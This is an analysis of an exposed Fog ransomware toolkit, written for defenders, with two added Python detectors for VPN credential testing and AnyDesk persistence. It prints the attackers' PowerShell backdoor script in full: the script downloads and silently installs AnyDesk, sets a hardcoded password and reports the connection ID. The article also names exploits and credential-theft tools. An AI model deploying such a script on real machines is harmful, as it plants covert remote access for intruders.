Cybersecurity analysts have uncovered an open directory linked to the Fog ransomware group, revealing a comprehensive toolkit used by threat actors to compromise corporate networks.
The directory, discovered in December 2024 and hosted at 194.48.154.79 on TCP port 80, contains tools for reconnaissance, exploitation, lateral movement, and persistence inside victim environments.
The discovery provides a rare look at the operational methodology of ransomware affiliates and shows how they combine custom scripts with publicly available tools to run their campaigns.
The Fog ransomware group, first observed in mid-2024, has been targeting organizations across multiple sectors, including technology, education, retail, and logistics.
The geographic distribution of victims spans Europe, North America, and South America, with particular concentration in Italy, Greece, Brazil, and the USA.
Analysis of the directory's contents indicates that initial access to victim networks was primarily obtained with compromised SonicWall VPN credentials, followed by exploitation of Active Directory weaknesses to reach domain administrator privileges.
The DFIR Report analysts identified a Python script within the directory specifically designed to test compromised SonicWall VPN credentials.
The script, found in a file named "sonic_scan/main.py", automates authentication to SonicWall VPN appliances with the stolen credentials and then runs port scans to identify potential entry points into the victim network.
This technique is consistent with earlier reporting that linked compromised SonicWall credentials to Fog ransomware intrusions.
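From the gateway's point of view, a tool that validates a batch of stolen VPN credentials looks like one source address cycling through many distinct usernames in a short window, with an occasional success. The following detector, added here as an example and not part of the original report or the Fog toolkit, scores VPN authentication logs for exactly that pattern. The log format ("ISO timestamp, source IP, username, OK or FAIL" per line) and the sample lines are assumptions constructed for the example; adapt the parser to your appliance's export.

```python
"""Flag credential testing against a VPN gateway from authentication logs.

Added example, not code from the Fog open directory or from The DFIR Report.
The log format is an assumption: one line per attempt,
"<ISO time> <src_ip> <user> <OK|FAIL>". SAMPLE_LOG is constructed data.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 203.0.113.7 tries five accounts in eight seconds and lands one;
# 198.51.100.4 is a normal login; 192.0.2.10 is a user mistyping once.
SAMPLE_LOG = """\
2024-12-01T08:00:01Z 203.0.113.7 asmith FAIL
2024-12-01T08:00:03Z 203.0.113.7 bjones FAIL
2024-12-01T08:00:05Z 203.0.113.7 cwhite FAIL
2024-12-01T08:00:07Z 203.0.113.7 dgreen OK
2024-12-01T08:00:09Z 203.0.113.7 ekhan FAIL
2024-12-01T08:15:00Z 198.51.100.4 dgreen OK
2024-12-01T09:00:00Z 192.0.2.10 asmith FAIL
2024-12-01T09:00:30Z 192.0.2.10 asmith OK
"""


def parse_log(text):
    """Return (time, src_ip, user, success) tuples, skipping malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, parts[1], parts[2], parts[3] == "OK"))
    return events


def detect_credential_testing(events, window=timedelta(minutes=10), min_users=4):
    """Per source IP, find the peak number of distinct usernames tried within
    `window`; sources at or above `min_users` are reported together with any
    accounts that authenticated successfully from that source."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[1]].append(ev)
    findings = {}
    for ip, evs in by_ip.items():
        evs.sort()
        peak, lo = 0, 0
        for hi in range(len(evs)):
            # Slide the window start forward until it fits within `window`.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            peak = max(peak, len({e[2] for e in evs[lo:hi + 1]}))
        if peak >= min_users:
            findings[ip] = {
                "peak_distinct_users": peak,
                "compromised": sorted({e[2] for e in evs if e[3]}),
            }
    return findings


if __name__ == "__main__":
    for ip, finding in detect_credential_testing(parse_log(SAMPLE_LOG)).items():
        print(ip, finding)
```

Accounts listed under "compromised" are the ones to reset and re-enrol first; the successful login from a second address for the same user shortly afterwards is the kind of follow-on access the page describes.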
What makes this discovery particularly concerning is the breadth of the toolkit, which includes exploits for Active Directory vulnerabilities such as Zerologon (CVE-2020-1472) and the domain controller impersonation flaws CVE-2021-42278 and CVE-2021-42287 (the sAMAccountName spoofing chain commonly known as noPac).
These tools enable threat actors to quickly escalate privileges within compromised environments, moving from initial access to domain dominance in relatively short timeframes.
The toolkit also includes the credential theft utility DonPAPI, which extracts secrets protected by the Windows Data Protection API (DPAPI): browser passwords and cookies, certificates, and Windows Credential Manager entries.
This broad access to credentials further eases lateral movement across the network.
A notable aspect of the Fog ransomware operation is its persistence mechanism through the legitimate remote access tool AnyDesk.
The directory contained a PowerShell script named “any.ps1” that automates the installation and configuration of AnyDesk with a hardcoded password.
This approach ensures the threat actors maintain access to compromised systems even if their initial entry point is remediated.
The script creates the directory C:\ProgramData\AnyDesk, downloads the genuine AnyDesk executable from download.anydesk.com (over plain HTTP) to C:\ProgramData\AnyDesk.exe, installs it silently with startup persistence, sets a predefined unattended-access password, and finally prints the AnyDesk ID the attacker will connect to:
Function AnyDesk {
    # Staging directory and download of the genuine installer over plain HTTP
    mkdir "C:\ProgramData\AnyDesk"
    $clnt = new-object System.Net.WebClient
    $url = "http://download.anydesk.com/AnyDesk.exe"
    $file = "C:\ProgramData\AnyDesk.exe"
    $clnt.DownloadFile($url,$file)
    # Silent install that registers AnyDesk to start with Windows
    cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
    # Hardcoded unattended-access password piped into AnyDesk
    cmd.exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password
    # Print the AnyDesk ID the attacker uses to connect back
    cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
This persistence tactic is effective because the binary itself is legitimate, signed software downloaded from the vendor's own site, so file-hash and reputation checks have nothing to flag.
What does stand out is the context around it: AnyDesk launched from C:\ProgramData rather than its normal install location, a PowerShell or cmd.exe parent process, the --silent and --start-with-win install flags, and an unattended-access password piped into --set-password on the command line. Monitoring for that combination, rather than for the binary alone, separates this backdoor from ordinary remote support software.
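The following hunt, added here as an example and not code from the Fog open directory or from The DFIR Report, turns the any.ps1 chain above into a detection over process-creation telemetry. The input format (one JSON object per line with host, time, parent, image and cmdline, roughly a normalised Sysmon Event ID 1 record) and the sample events are assumptions constructed for the example; host WS01 replays the script's three commands, WS02 is a user installing AnyDesk interactively, and WS03 is unrelated noise.

```python
"""Hunt for the any.ps1-style AnyDesk persistence chain in process-creation telemetry.

Added example, not code from the Fog open directory or from The DFIR Report.
Input format is an assumption: one JSON object per line with host, time, parent,
image and cmdline (normalised Sysmon Event ID 1). SAMPLE_EVENTS is constructed
data, not real victim telemetry.
"""
import json
import re
from collections import defaultdict

SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2024-12-02T10:14:01Z",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"host": "WS01", "time": "2024-12-02T10:14:09Z",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c echo Admin#123 | C:\ProgramData\anydesk.exe --set-password"},
    {"host": "WS01", "time": "2024-12-02T10:14:10Z",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id"},
    {"host": "WS02", "time": "2024-12-02T11:02:40Z",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "cmdline": r'"C:\Users\jdoe\Downloads\AnyDesk.exe"'},
    {"host": "WS03", "time": "2024-12-02T11:30:00Z",
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe"},
]
SAMPLE_LOGS = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

ANYDESK_RE = re.compile(r"anydesk\.exe", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# One indicator per step of the any.ps1 chain shown on the page.
INDICATOR_RES = {
    "silent_install": re.compile(r"--install\b.*--silent\b|--silent\b.*--install\b", re.I),
    "start_with_win": re.compile(r"--start-with-win\b", re.I),
    "set_password": re.compile(r"--set-password\b", re.I),
    "get_id": re.compile(r"--get-id\b", re.I),
    "programdata_path": re.compile(r"\\programdata\\anydesk(?:\.exe)?\b", re.I),
}
# The script pipes the password through echo, so it is recoverable from the command line.
PIPED_PASSWORD_RE = re.compile(r"echo\s+(\S+)\s*\|\s*.*--set-password", re.I)


def parse_events(text):
    """Parse newline-delimited JSON, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def tag_event(event):
    """Return the any.ps1 indicators present in one event (empty if not AnyDesk-related)."""
    cmdline = event.get("cmdline", "")
    if not (ANYDESK_RE.search(cmdline) or ANYDESK_RE.search(event.get("image", ""))):
        return set()
    tags = {name for name, rx in INDICATOR_RES.items() if rx.search(cmdline)}
    parent = event.get("parent", "").rsplit("\\", 1)[-1].lower()
    if parent in SCRIPT_HOSTS:
        tags.add("script_parent")
    return tags


def severity(indicators):
    """Rank a host's accumulated indicators; None means no alert."""
    if "set_password" in indicators and "silent_install" in indicators:
        return "critical"
    if "set_password" in indicators:
        return "high"
    if "silent_install" in indicators and indicators & {"start_with_win", "script_parent"}:
        return "medium"
    return None


def hunt(events):
    """Aggregate indicators per host and report hosts that cross an alert threshold."""
    per_host = defaultdict(lambda: {"indicators": set(), "times": [], "password": None})
    for ev in events:
        tags = tag_event(ev)
        if not tags:
            continue
        entry = per_host[ev.get("host", "?")]
        entry["indicators"] |= tags
        entry["times"].append(ev.get("time", ""))
        m = PIPED_PASSWORD_RE.search(ev.get("cmdline", ""))
        if m:
            entry["password"] = m.group(1)
    findings = {}
    for host, entry in per_host.items():
        sev = severity(entry["indicators"])
        if sev is None:
            continue
        findings[host] = {"severity": sev, "indicators": sorted(entry["indicators"]),
                          "first_seen": min(entry["times"]), "last_seen": max(entry["times"]),
                          "password_in_cmdline": entry["password"]}
    return findings


if __name__ == "__main__":
    for host, finding in hunt(parse_events(SAMPLE_LOGS)).items():
        print(host, finding)
```

The interactive install on WS02 matches the AnyDesk binary but none of the chain's indicators, so it produces no finding; the scoring deliberately keys on the silent install flags, the scripted parent and the piped password rather than on the presence of AnyDesk itself. Recovering the password from the command line also gives responders the exact credential to revoke.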
The discovery of this directory provides useful intelligence for organizations defending against the Fog ransomware group and underlines two priorities: protecting VPN credentials (strong MFA and prompt resets of exposed accounts) and monitoring for unauthorized remote access tools.